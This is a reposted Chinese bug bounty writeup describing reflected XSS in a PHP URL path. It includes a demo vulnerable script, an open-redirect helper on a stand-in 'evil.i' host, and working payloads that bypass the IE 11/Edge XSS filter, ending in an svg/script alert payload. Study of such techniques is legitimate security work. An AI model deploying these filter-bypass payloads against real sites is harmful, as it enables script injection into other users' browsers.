bug bounty writeup - xss in url path

最新推荐文章于 2022-11-14 15:52:46 发布
最新推荐文章于 2022-11-14 15:52:46 发布
阅读量193 收藏
点赞数
文章标签: php
原文链接:http://www.cnblogs.com/iamstudy/articles/bug_bounty_writeup_1_xss_in_url_path.html
版权

漏洞点: http://lemon.i/test/xss/13.php/i_am_xss_point/i_am_xss_point/

Demo Code:

<?php
header('HTTP/1.1 404 Not Found');
$path = trim($_SERVER['PATH_INFO'],"/");
$limit_pos = strrpos(trim($path,"/"),'/');
$action_name = substr($path, $limit_pos);
$controller_name = str_replace("/","\\",substr($path, 0, $limit_pos));
echo "Action: " . $action_name . " has controller: \\" . $controller_name;
?>

1、404头的问题
如果404响应返回内容小于512字节,则使用IE自带的404页面

804631-20181008221103892-1820997671.jpg

所以添加多个字符即可显示出来内容
804631-20181008221123054-833974587.jpg

2、url path问题 -> urlencode编码
浏览器下访问直接访问都会进行url编码,

804631-20181008221141703-537432245.jpg

但是在IE下,使用3xx跳转后可以绕过

<?php
header("Location: "http://".$_GET["host"]."/".urldecode($_GET["payload"]),true,302);
http://evil.i/test/xss/12.php?host=lemon.i/test/xss/13.php&payload=<>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa<>

804631-20181008221153234-666101414.jpg

但是可以看到ie filter限制了
804631-20181008221208400-1123926882.jpg

3、bypass IE filter
IE edge / 11下这样利用

<iframe onload="contentWindow[0].location='//vulnerabledoma.in/bypass/text?q=<script>alert(location)</script>'" src="//vulnerabledoma.in/bypass/text?q=%3Ciframe%3E"></iframe>

所以换到目标,则payload为如下:

<iframe src="http://evil.i/test/xss/12.php?host=lemon.i/test/xss/13.php&payload=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa<iframe>" onload="contentWindow[0].location='http://evil.i/test/xss/12.php?host=lemon.i/test/xss/13.php&payload=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa<img src=1 onerror=alert(1)>'"></iframe>

804631-20181008221223663-1071523810.jpg

但是又被一些坑点限制了:

无空格(会被url->%20)
无/(会被转换为\)

4、bypass限制
通过下面的payload可绕过

<svg><script>alert(document.domain)<b>

最终payload:

<iframe src="http://evil.i/test/xss/12.php?host=lemon.i/test/xss/13.php&payload=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa<iframe>" onload="contentWindow[0].location='http://evil.i/test/xss/12.php?host=lemon.i/test/xss/13.php&payload=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa<svg><script>alert(document.domain)<b>'"></iframe>

804631-20181008221242686-685625231.jpg

Referer

Reflected XSS in the IE 11 / Edge
Browser's XSS Filter Bypass Cheat Sheet

转载于:https://www.cnblogs.com/iamstudy/articles/bug_bounty_writeup_1_xss_in_url_path.html

dengzhasong7076
关注
Bug Bounty Tip - i春秋Self-XSS变废为宝的奇思妙想
04-30
### Bug Bounty Tip - i春秋Self-XSS变废为宝的奇思妙想 #### 0x01 前言 在网络安全领域中,“自我跨站脚本攻击”(Self-XSS)通常被视为一个不起眼的安全问题。然而,在实际应用中,通过巧妙的设计和策略,Self-...
做了一个XSS的闯关游戏,攻略贴上来
yd0str
12-13 8839
游戏地址: http://xss-quiz.int21h.jp 第一关:比较简单,直接输入 http://xss-quiz.int21h.jp/?sid=2a75ff06e0147586b7ceb0fe68ee443b86a6e7b9 第二关:也相对简单,闭合标签 http://xss-quiz.int21h.jp/stage2.php?sid=f2d7d60125bdddb20
网络信息安全攻防学习平台-脚本关 writeup
4ct10n
09-17 2万+
1.key又又找不到了直接burpsuit截断 出flag key is : yougotit_script_now2 .快速口算这道题比较有意思 在两秒钟之内回答他的算术题 思路:直接编写python脚本访问网站,获取html计算算式,得出答案,post传参,注意要建立长连接。 代码如下:#-*-coding:utf-8-*- import requests, re url = '
xss-labs 通关笔记
Ewige的博客
06-30 519
靶场地址:传送门 概述: XSS(跨站脚本)概述 Cross-Site Scripting 简称为“CSS”,为避免与前端叠成样式表的缩写"CSS"冲突,故又称XSS。一般XSS可以分为如下几种常见类型: 1.反射性XSS; 反射型XXS是一种非持久性的攻击,它指的是恶意攻击者往Web页面里插入恶意代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意攻击用户的目的。这里插入的恶意代码并没有保存在目标网站,需要引诱用户点击一个链接到目标网站的恶意链接来实施攻击。 原文链接:ht
kali linux 2.0 web 渗透测试 电子书
weixin_33888907的博客
06-01 457
打起精神,重新开启订阅号的原创文章写作工作,但是需要点时间,请耐心等待。 求资料的同学,没有及时回复的,请再次留言,我会尽快处理。今天分享两本电子书,虽然是英文的,但是难度不高。 第一本是基于Kali 2.0 的web渗透测试 链接: pan.baidu.com/s/1slLgAAD 密码: 8gvn 第二本是基于Hadoop的大数据取证技术 链接: pan.baidu.com/s/1qY37DM...
xss跳转代码_XSS跨站脚本攻击-靶场writeup&总结
weixin_39963819的博客
11-21 569
XSS简介XSS(跨站脚本攻击)是指攻击者在网页中嵌入客户端脚本,通常是Javascript编写的恶意代码,当用户使用浏览器浏览被嵌入恶意代码的网页时,恶意代码将在用户的浏览器上被解析执行。XSS Education环境搭建docker search xss # 搜索docker镜像,找到xss education对应的image docker run -d -p {p}:80 {sha} # {...
Bug-Bounty-Tools:错误赏金的随机工具
04-14
"Bug-Bounty-Tools" 是一个专门为参与Bug Bounty活动的专家设计的工具集合,旨在帮助他们在寻找安全漏洞的过程中提高效率。 在"BugBounty"领域,工具的使用至关重要,因为它们可以自动化某些任务,例如扫描、漏洞...
bug-bounty-colab
04-21
漏洞赏金猎虫队明智地使用Google工具关于该...入门要使其运行,只需按照以下步骤操作:先决条件使用Chrome和ssh用法只需单击“ Open In Colab Button并运行Bug Hunting Colab单元。 [ ]( 接触VP-Dextro- - 项目链接:
bug-bounty-research
03-06
在"bug-bounty-research-main"这个压缩包文件中,可能包含了关于错误赏金研究的详细资料,如: 1. **漏洞挖掘技术**:这部分可能涵盖如何识别和利用HTML漏洞,包括使用工具如Burp Suite、OWASP ZAP进行自动化扫描,...
11-building-a-bug-bounty-program-from-the-trenches.zip
10-25
【标题】"11-building-a-bug-bounty-program-from-the-trenches.zip" 提到的是一个关于构建漏洞赏金计划的资源包。漏洞赏金计划是企业为了发现并解决其软件系统中的安全漏洞,主动邀请安全专家和白帽黑客进行漏洞...
ctf入门(转载)
wxy201008的博客
08-28 2456
CTF入门指南(0基础) ctf入门指南 如何入门?如何组队? capture the flag 夺旗比赛 类型: Web 密码学 pwn 程序的逻辑分析,漏洞利用windows、linux、小型机等 misc 杂项,隐写,数据还原,脑洞、社会工程、与信息安全相关的大数据 reverse 逆向windows、linux类 ppc 编程类的 国内外著名比赛 国外: 国内:xctf联赛 0ctf上海国...
白帽子之web漏洞--xss攻击
鼓浪屿岛与海的博客
12-04 491
本文仅供学习,不支持一切以不法利益为目的的商业攻击 一.xss攻击原理 xss 是“跨站脚本攻击”,是一种注入攻击,当web应用对用户输入过滤的不严格时,攻击者写入恶意的脚本(CSS,HTML,JavaScript)到网页中时,如果访问了含有恶意代码的页面,恶意脚本就会被浏览器解析执行导致用户被攻击 二.常见xss危害 cookie窃取,session劫持,钓鱼攻击,蠕虫,ddos等。 ...
Web安全--XSS(跨站脚本攻击)
最新发布
bobo_milk的博客
11-14 852
攻击者向web页面插入恶意可执行脚本代码,当用户浏览该页面时,嵌入到web页面的恶意代码就会被执行,从而达到攻击者盗取用户信息或侵犯用户安全隐私的目的。存储型:代码存放在服务器中,一般在个人信息或留言等地方,每当访问该页面就会触发代码(具有很高隐蔽性)DOM型:处理后的结果会成为页面的一部分,不提交数据到服务器,从客户端获得DOM中的数据在本地执行。存储型:发送一次带有xss代码的请求,以后在这个页面数据包都会有xss代码。反射型:发送一次带有xss代码的请求,只在当前数据包会有xss代码。
BugKu Web WriteUp
AlexYoung28的博客
08-24 2241
Web 8 这道题的代码和前面的文件包含写的思路一样, 我们都是运用  php://input 写,来实现我们从文件中读出的数据和我们传入的数据一样。 我写的如下:  只要保证  $ac  的值 和我们写入文件  $fn 的值 一样即可, 我这里都写的是 123 细心 这道题刚开始看到主页之后,又看了源代码和抓了包,发现都没有什么特别的地方,所以,只有拿御剑扫描一下后台。 ...
网络安全必学知识点之XSS漏洞
kali_Ma的博客
09-23 2629
xss漏洞小结 一、初识XSS 1、什么是XSS XSS全称跨站脚本(Cross Site Scripting),为避免与层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故缩写为XSS。这是一种将任意 Javascript 代码插入到其他Web用户页面里执行以达到攻击目的的漏洞。攻击者利用浏览器的动态展示数据功能,在HTML页面里嵌入恶意代码。当用户浏览改页时,这些潜入在HTML中的恶意代码会被执行,用户浏览器被攻击者控制,从而达到攻击者的特殊目的,如 cookie窃取等。
XSS跨站脚本攻击过程最简单演示
热门推荐
smstong的成长轨迹
02-06 8万+
实例演示XSS的攻击全过程。
先知XSS挑战赛题解 - Exploiting the "unexploitable"
dengzhasong7076的博客
08-24 945
膜M师傅!!! 挑战说明地址:https://xianzhi.aliyun.com/forum/read/1990.html Writeup已投稿到先知:https://mp.weixin.qq.com/s/d_UCJusUdWCRTo3Vutsk_A 源码下载: http://t.cn/RNG8tZA 0. 说明 玩了挺久的一个挑战,整个过程中被虐到变形,感谢M师傅的小课堂,学习到很多...
xss跨站攻击详讲 | 如何利用xss拿下一个站?
向阳-Y.的博客
11-13 1万+
1.初识xxs跨站漏洞xss能干什么? 利用xss获取对方后台地址、cookie信息,得到cookie和后台地址后,能通过相关工具(比如postman)进行后台登录: 其他补充: cookie :一般用于小中型网站,一般存储在自己电脑上,存活时间较长 session:采用会话模式,一般用于大型网站,一存储在服务器上,存活时间较短 2.xss的类型 2.1反射型 当在网页插入下列xss代码后,会立即回馈到屏幕,但这条xss代码并不会一直存储到该网站上 <script>alert(1)&
一个存储型xss的bypass案例
Websec
03-03 2227
翻译: 原文地址:https://medium.com/bugbountywriteup/story-of-a-stored-xss-bypass-26e6659f807b 漏洞类型:存储型xss 作者:Prial Islam Khan …… 最近我在测试一个私人网站,在该网站中,用户可以添加他们的个人信息。我注意到一个名为Secret Key的输入,它允许用户处理付款并将交易信息...
"深入Bug Bounty职业生涯,探索网络安全渗透测试漏洞的技能与平台
4. Bug Hunt:Bug Hunt是国内领先的漏洞赏金平台之一,致力于帮助企业挖掘和解决安全漏洞问题。 5. Hackaflag:Hackaflag是一项世界范围的CTF(Capture The Flag)比赛,旨在测试参与者的技能和知识。参与者可以...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值